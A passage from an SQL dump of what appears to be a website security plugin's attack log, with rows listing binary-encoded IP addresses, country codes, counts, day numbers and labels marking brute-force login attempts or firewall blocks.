rute'),('\0\0\0\0\0\0\0\0\0\0�����_','DE',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����_','DE',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0�����_','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����Ѝ','AR',1,18855,'waf'),('\0\0\0\0\0\0\0\0\0\0���a*','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���dz�','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���e�L','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���e�+','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���e�f','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����J','VN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����J','VN',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����J','VN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����J','VN',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����2<','VN',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0����9�','CA',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����9�','CA',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����O','DE',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����O','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����x','US',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0���옔','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���옔','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���옔','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����\n','US',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����\n','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����\n','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0����d','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����d','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����d','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����o','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0����o','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����o','US',3,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����o','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����q','US',3,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����q','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����q','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����t','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����t','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����t','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����}','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0����}','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����}','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����}','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���츈','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0�����)','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0�����)','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����)','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����~','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����~','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����A','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����,�','DE',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����ʰ','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����ʰ','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����p�','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0����p�','US',2,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���kb','CN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0�����\'','MY',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���	:','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���	F�','DE',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���	�C','DE',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r','FR',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','FR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','FR',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','FR',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','FR',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','FR',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','FR',3,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','FR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���5T�','TR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���5T�','TR',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���wң','GR',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���wң','GR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���wң','GR',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���wң','GR',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����؛','TR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n�u','BR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o','BR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���I�-','BR',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���I�-','BR',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���I�-','BR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���}/8','BR',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���>M�','GB',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���>p{','GB',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0���|�9','BY',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���|�9','BY',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����2','SG',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����3�','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����9�','SG',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0����L`','US',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����L`','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����q�','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����8','GB',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0�����8','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0�����8','GB',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0�����z','DE',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Q','SG',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Q','SG',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"\n','RO',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���kS�','BR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���l��','BR',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���l��','BR',2,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0������','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"','ID',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"','ID',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���_l','AR',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����F','ID',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����F','ID',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���5#','TH',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','MO',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����`�','BD',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����`�','BD',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���PǗ','VN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�_','TH',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�_','TH',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�_','TH',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�_','TH',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�_','TH',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�_','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�_','TH',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�_','TH',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���_&�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���_&�','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����zB','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����~�','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����~�','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���!','IT',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���!','IT',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���,','IT',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���,','IT',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���,','IT',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���G','IT',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���G','IT',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0���G','IT',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���','CH',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�','GB',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�','GB',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�','GB',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��� �&','PT',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���.x�','US',3,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',3,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',2,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���1K','FR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���1N','FR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���1N','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���2��','ES',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���2��','ES',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0���2��','ES',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�:','IR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vҳ','ES',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vҳ','ES',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vҳ','ES',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','KZ',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','KZ',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���h�-','GR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���u��','CH',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���~�+','TR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���~�+','TR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����M','GB',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','IR',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����t\r','IR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����-%','RU',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0����-%','RU',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����-%','RU',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0����-%','RU',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0����9d','NL',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0����9d','NL',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����9d','NL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����z�','BY',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����z�','BY',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����z�','BY',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����z�','BY',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','IR',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0����a�','NO',1,18856,'waf'),('\0\0\0\0\0\0\0\0\0\0����a�','NO',16,18860,'waf'),('\0\0\0\0\0\0\0\0\0\0����a�','NO',16,18861,'waf'),('\0\0\0\0\0\0\0\0\0\0���\n5	','CL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���EC','CO',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r','CL',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r','CL',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r','CL',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���@rP','CL',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���@sP','CL',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t7','CL',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���@u_','CL',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���@vs','CL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���@v�','CL',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���@w�','CL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���@w�','CL',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���3','BR',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���3','BR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���3','BR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���3','BR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���(�','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���(%�','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','TR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����8�','NL',2,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����8�','NL',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0����8�','NL',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',2,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����դ','SG',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����','GB',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���}','BR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���k��','CL',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���k��','CL',2,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���k��','CL',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���w�','PE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ҷ�','AR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','AR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���a\n','CO',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���\"<�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���Qӈ','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q֨','US',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q֨','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q֨','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���c\no','CA',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�9','CA',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���t�','IL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����j�','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����|','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����|','US',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����|','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���:\"','CH',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���:\"','CH',3,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���:\"','CH',3,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����y','UA',2,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����y','UA',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����y','UA',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����y','UA',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0����y','UA',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���py','CN',3,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','RO',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��£��','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��£��','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��£��','DE',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��£�','DE',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��¶�\r','BG',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0����Kj','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','UA',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�S','KZ',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�S','KZ',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�S','KZ',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��Å(.','CZ',3,18850,'waf'),('\0\0\0\0\0\0\0\0\0\0��Úȯ','FR',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��Úȯ','FR',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0��Úȯ','FR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ú�','FR',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���ɬL','DE',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0�����!','DE',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����uR','GB',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����D','ZA',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���)z�','ZA',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�7','ZW',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�7','ZW',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r\n','TN',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��ś�','ML',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���','KE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���R-','CA',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���R-','CA',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���6x]','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���6~','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��ƚ�C','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��ƚ�C','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0����U�','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0����U�','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����V(','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ǽ��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���w','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����;H','IL',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���oXr','CL',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ȗ��','BR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��ɔ�5','MX',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0�����]','CL',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����]','CL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���`J','BD',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���`J','BD',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���=��','AT',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���=��','AT',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���=��','AT',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��ʽ��','JP',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��ʽ��','JP',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ng8','TH',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�&','HK',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��˖kM','TH',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��˖kM','TH',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��˖kM','TH',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','VN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','VN',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����bc','HK',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���,X#','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���,X#','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���,X#','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���,X#','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���H��','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q�','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν2�','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν2�','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��νUX','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��νUX','SG',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��νUX','SG',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��νY�','SG',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��νh','NL',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�','IN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�','IN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν��','IN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�:','SG',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�:','SG',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν��','US',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�$','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���ݰ�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���-�B','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���-�B','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��ψ.','AU',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��ψ.','AU',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ϛ�Y','DE',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴ�','DE',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴ�','DE',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���D\'','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�S','US',1,1884